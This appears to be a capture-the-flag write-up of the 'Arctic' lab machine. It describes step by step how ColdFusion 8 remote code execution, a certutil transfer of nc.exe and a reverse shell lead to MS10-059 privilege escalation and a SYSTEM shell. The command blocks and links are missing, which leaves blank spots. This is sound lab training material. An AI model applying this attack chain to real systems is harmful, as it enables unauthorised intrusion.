Arctic
Last updated
Was this helpful?
Last updated
Was this helpful?
Discovered only three open ports: RPC on 135, another MSRPC on 49154, and port 8500 running Adobe ColdFusion 8.
Identified ColdFusion 8 as vulnerable to RCE using .
Gained a reverse shell via ColdFusion’s vulnerable REST endpoint.
Used windows-exploit-suggester to identify privilege escalation paths.
Chose MS10-059 for kernel-level privilege escalation.
Uploaded the exploit via certutil and popped a SYSTEM shell.
Nmap Output:
Visiting http://10.10.10.11:8500 showed Adobe ColdFusion 8 interface.
ColdFusion 8 has known unauthenticated RCE exploits, particularly via FCKeditor or misconfigured endpoints.
Exploit works by uploading a .jsp webshell via the vulnerable file upload endpoint exposed in ColdFusion 8.
Steps:
Modified exploit to upload reverse shell.
Started a local HTTP server to host payload:
Payload logic:
Upload nc.exe to victim using certutil
Execute it using the uploaded .jsp web shell
Example access:
Reverse shell landed on port 7777. Initial shell was low-privilege.
Used windows-exploit-suggester to identify escalation paths:
Target identified as Windows 2008 R2 64-bit with no installed patches.
Chose exploit: MS10-059 – Vulnerability in the Tracing Feature for Services.
Uploaded the executable using certutil:
Ran the exploit with a listener on port 9999:
On attacker machine:
SYSTEM reverse shell established 🎯
Used — Adobe ColdFusion 8 RCE exploit.
Downloaded compiled exploit from: